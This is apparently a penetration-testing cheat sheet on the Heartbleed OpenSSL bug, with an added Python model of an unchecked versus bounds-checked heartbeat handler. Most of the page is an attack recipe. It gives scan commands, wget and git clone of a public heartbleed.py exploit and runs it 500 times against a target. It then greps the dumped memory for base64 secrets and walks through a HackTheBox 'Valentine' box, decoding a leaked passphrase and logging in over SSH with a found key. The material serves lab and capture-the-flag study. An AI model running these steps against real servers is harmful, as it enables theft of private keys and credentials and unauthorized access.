Heartbleed
Basics
Vulnerability in the popular OpenSSL cryptographic software library.
Allows anyone who can reach the service to read chunks of memory from systems running the vulnerable OpenSSL version.
Grabs a memory dump - might find all kinds of goodies!!
"How the heartbleed bug works"
Meg: Server, are you still there? If so, reply 'HAT' with 500 letters
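The length mistake behind that exchange, as an added Python model (not code from the original page or from OpenSSL): a heartbeat handler that trusts the declared payload length beside the hardened one that applies the RFC 6520 bounds check. The record layout follows RFC 6520; the "neighbour" memory bytes are constructed for the simulation.

```python
import struct
from typing import Optional

# RFC 6520 HeartbeatMessage: type(1) | payload_length(2) | payload | padding(>=16)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16
# Constructed stand-in for whatever happens to sit next to the record on the heap.
NEIGHBOUR = b"hype_key=-----BEGIN RSA PRIVATE KEY-----...(constructed)"

def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_len lets the declared length disagree
    with the bytes actually sent (the 'HAT' with 500 letters condition)."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING

def handle_unchecked(record: bytes, memory_after_record: bytes) -> bytes:
    """Model of the unpatched handler: trusts payload_length and copies that many
    bytes from wherever the record sits, so it over-reads into adjacent memory."""
    _, claimed_len = struct.unpack("!BH", record[:3])
    heap = record + memory_after_record        # record followed by its neighbour
    echoed = heap[3:3 + claimed_len]           # runs past the real payload
    return struct.pack("!BH", HB_RESPONSE, claimed_len) + echoed + b"\x00" * MIN_PADDING

def handle_checked(record: bytes) -> Optional[bytes]:
    """Hardened handler: payload_length must fit inside the received record with
    room for the padding; anything else is silently dropped (returns None)."""
    if len(record) < 3 + MIN_PADDING:
        return None
    hb_type, claimed_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    if 3 + claimed_len + MIN_PADDING > len(record):
        return None                            # declared length exceeds the record
    payload = record[3:3 + claimed_len]
    return struct.pack("!BH", HB_RESPONSE, claimed_len) + payload + b"\x00" * MIN_PADDING

def response_payload(resp: bytes) -> bytes:
    """Extract the echoed payload from a heartbeat response."""
    _, n = struct.unpack("!BH", resp[:3])
    return resp[3:3 + n]

if __name__ == "__main__":
    honest = build_heartbeat(b"HAT")                   # 3 bytes sent, 3 declared
    lying = build_heartbeat(b"HAT", claimed_len=500)   # 3 bytes sent, 500 declared
    print(response_payload(handle_unchecked(lying, NEIGHBOUR)))  # leaks NEIGHBOUR
    print(handle_checked(lying))                       # None: request dropped
    print(response_payload(handle_checked(honest)))    # b'HAT'
```

Running it shows the unchecked handler echoing the constructed private-key bytes back, while the checked handler answers the honest request and discards the oversized one.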
Detection
> nmap --script vuln $IP
> sslyze --heartbleed $IP
Exploit
google: python heartbleed github
-----------
Download
https://gist.github.com/eelsivart/10174134#file-heartbleed-py-L8
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
git clone https://gist.github.com/10174134.git
-----------
searchsploit -w heartbleed
https://exploit-db.com/exploits/32764
-----------
python heartbleed.py
python heartbleed.py -p 443 -n 10 $IP
./heartbleed.py $IP -n 500 -a output.txt ..winner
-n 500 ..Number of times to connect/loop (1 = default)
-a output.txt
grep '=' output.txt ..look for base64 strings (trailing '=' padding)
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== ..valentineHTB
Example
valentineHTB - had an ssh key password entered on 'decode.php'
hype_key was hidden somewhere else on the site :)
We can grab the memory, decode the key, and ssh to the box
-----------
decode.php
aGVhcnxyz== ..found
-----------
echo 'aGVhcnxyz==' | base64 -d ..mysecretkey
ssh -i hype_key hype@$IP ..connect